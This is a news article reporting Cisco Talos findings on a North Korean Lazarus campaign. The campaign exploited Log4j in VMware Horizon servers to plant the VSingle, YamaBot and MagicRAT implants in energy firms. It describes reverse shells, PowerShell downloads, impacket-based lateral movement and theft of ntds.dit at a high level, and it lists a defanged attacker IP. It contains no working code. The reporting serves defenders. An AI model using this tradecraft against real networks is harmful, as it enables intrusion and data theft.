Lazarus APT group exploits Log4j vulnerability on exposed VMware Horizon servers to target energy firms

Researchers at Cisco Talos have been tracking a new campaign operated by the Lazarus advanced persistent threat (APT) group, attributed to North Korea by the U.S. government. Between February and July this year, the group is said to have exploited Log4j vulnerabilities in VMware Horizon servers to gain an initial foothold into targeted organizations, including energy providers from around the world, including those headquartered in the U.S., Canada, and Japan. 

Cisco assesses that the campaign is meant to infiltrate organizations worldwide to establish long-term access and subsequently exfiltrate data of interest to the adversary’s nation-state. The researchers also discovered the use of two known malware families in these intrusions, VSingle and YamaBot. Additionally, the researchers also discovered the use of a recently disclosed implant that it is calling ‘MagicRAT’ in this campaign.

“This campaign was previously partially disclosed by other security firms, but our findings reveal more details about the adversary’s modus operandi,” Jung soo An, Asheer Malhotra, and Vitor Ventura, Cisco Talos researchers, wrote in a blog post. “We have also observed an overlap of command and control (C2) and payload-hosting infrastructure between our findings and the U.S. Cybersecurity and Infrastructure Security Agency’s (CISA) June advisory that detailed continued attempts from hackers to compromise vulnerable VMware Horizon servers.”

In April, Symantec, a division of Broadcom Software, disclosed that the Lazarus group has been conducting an espionage campaign targeting organizations operating within the chemical sector. The campaign appears to be a continuation of Lazarus’ activity dubbed ‘Operation Dream Job,’ initially observed in August 2020. Symantec tracks this sub-set of Lazarus activity under the name Pompilus.

The Cisco researchers said that the main goal of the Lazarus APT attacks was likely to establish long-term access into victim networks to conduct espionage operations in support of North Korean government objectives. “This activity aligns with historical Lazarus intrusions targeting critical infrastructure and energy companies to establish long-term access to siphon off proprietary intellectual property,” they added.

The post said that Cisco Talos assesses with high confidence that these attacks have been conducted by the North Korean state-sponsored hacker Lazarus Group. “During our investigations, we identified three distinct RATs being employed by the threat actors, including VSingle and YamaBot, which are exclusively developed and distributed by Lazarus. The Japanese CERT (JPCERT/CC) recently published reports (VSingle, YamaBot), describing them in detail and attributed the campaigns to the Lazarus threat actor,” it added.

The researchers also said that the TTPs (tactics, techniques, and procedures) used in these attacks also point to the Lazarus hacker group, which breached the Log4j vulnerability on exposed VMware Horizon servers. Successful post-exploitation led to the download of their toolkit from web servers. The same initial vector, URL patterns, and similar subsequent hands-on-keyboard activity have been described in the AhnLab report from earlier this year. There are also overlapping IOCs between the campaign described by AhnLab and the current campaign, such as the IP address 84[dot]38.133[dot]145, which was used as a hosting platform for the hackers’ malicious tools. 

“Although the same tactics have been applied in both attacks, the resulting malware implants deployed have been distinct from one another, indicating the wide variety of implants available at the disposal of Lazarus,” according to the researchers. 

“Additionally, we’ve also observed similarities in TTPs disclosed by Kaspersky attributed to the Andariel sub-group under the Lazarus umbrella, with the critical difference being the deployment of distinct malware. While Kaspersky discovered the use of Dtrack and Maui, we’ve observed the use of VSingle, YamaBot, and MagicRAT.” In July, the U.S. agencies released a joint cybersecurity advisory warning of North Korean state-sponsored cyber hackers using Maui ransomware to target the healthcare and public health sector since at least May 2021.

Cisco Talos acknowledges that when analyzed individually, the attribution evidence only reaches medium-confidence, “however, we’re raising our confidence level when analyzing all these points in the context of the campaign and victims,” they said.

The researchers identified the exploitation of the Log4Shell vulnerability on VMware Horizon public-facing servers as the initial attack vector. A series of activities follow the compromise to establish a foothold on the systems before the attackers deploy additional malware and move laterally across the network.

“During our investigation, we discovered two different foothold payloads. In the first, the attackers abuse node.exe, which is shipped with VMware to execute the oneliner node.exe script,” they added. “This essentially opens an interactive reverse shell that attackers could use to issue arbitrary commands on the infected entry endpoint.”

In another victim’s network, “we saw a similar chain of events: initial recon followed by disabling the AV software and the deployment of a bespoke implant. We also observed successful lateral movement into other endpoints in the enterprise,” according to the researchers. “What’s unique in this intrusion, however, is that we observed the deployment of a fairly new implant three days before the attackers deployed VSingle on the infected systems,” they added.

The researchers said that MagicRAT was configured with a different configuration file and path in this campaign. “It also reported to different C2 servers. The configuration directory is now called ‘MagicMon’ in the current user’s AppData\Roaming directory.” The folder “creates and hosts an initialization file named ‘MagicSystem[dot]ini.’ This INI file contains several configurations including the list of C2 URLs that can be used by the implant to send and receive commands and data,” they added.

During the first few days after the successful initial access, the attackers conducted limited reconnaissance of the endpoint and deployed two different malware families, MagicRAT and VSingle, on the infected endpoint to maintain covert access to the system, the researchers said. “Just like with the first victim, the attackers then started to perform Active Directory (AD) related explorations (via impacket and VSingle) to identify potential endpoints to laterally move into. The table below illustrates the commands executed to perform such actions,” they added.

The researchers observed that once the list of computers and users is obtained, the attackers would manually ping specific endpoints in the list to verify if they are reachable (with an occasional tracert). VSingle deployment on new hosts was done using WMIC to start a remote process. This process was, in fact, a PowerShell snippet that would download VSingle from a remote system. In some infections, “we observed the deployment of impacket tools on other endpoints to move laterally and establish an interactive shell. This stage of the attacks was clearly manual work performed by a human operator. While trying to establish interactive remote console sessions, we can see the operators making errors on the commands,” they added.

“During one particular intrusion, the attackers first deployed VSingle on the endpoint,” the Cisco researchers said. “However, after the VSingle sample was detected, the attackers were at risk of losing access to the enterprise. Therefore, after repeated failed attempts to deploy VSingle on the endpoints, the attackers then deployed another updated copy of VSingle. After maintaining continued access for a while, the attackers then moved on to the use of another implant — YamaBot,” they added.

The researchers added that the YamaBot is a custom-made GoLang-based malware family. It uses HTTP to communicate with its C2 servers. It typically begins by sending preliminary system information about the infected endpoint to the C2: computer name, username, and MAC address.

The implant has standard RAT capabilities, including listing files and directories, sending process information to C2, downloading files from remote locations, executing arbitrary commands on the endpoints, and uninstalling itself. “Apart from the usual recon and deployment of the custom implants, we also observed Lazarus’ use of completely different TTPs for credential harvesting. The attackers created backups of volumes that were then used to create a copy of the ‘ntds[dot]dit’ file for exfiltration containing Active Directory data,” the researchers added.

Last month, the Microsoft Threat Intelligence Center (MSTIC) and Microsoft 365 Defender Research Team identified that a Iran-based threat group, Mercury, has been exploiting Log4j 2 vulnerabilities in SysAid applications across Israeli organizations. Furthermore, MSTIC assesses with high confidence that Mercury’s observed activity was affiliated with Iran’s Ministry of Intelligence and Security (MOIS).

Anna Ribeiro

Industrial Cyber News Editor. Anna Ribeiro is a freelance journalist with over 14 years of experience in the areas of security, data storage, virtualization and IoT.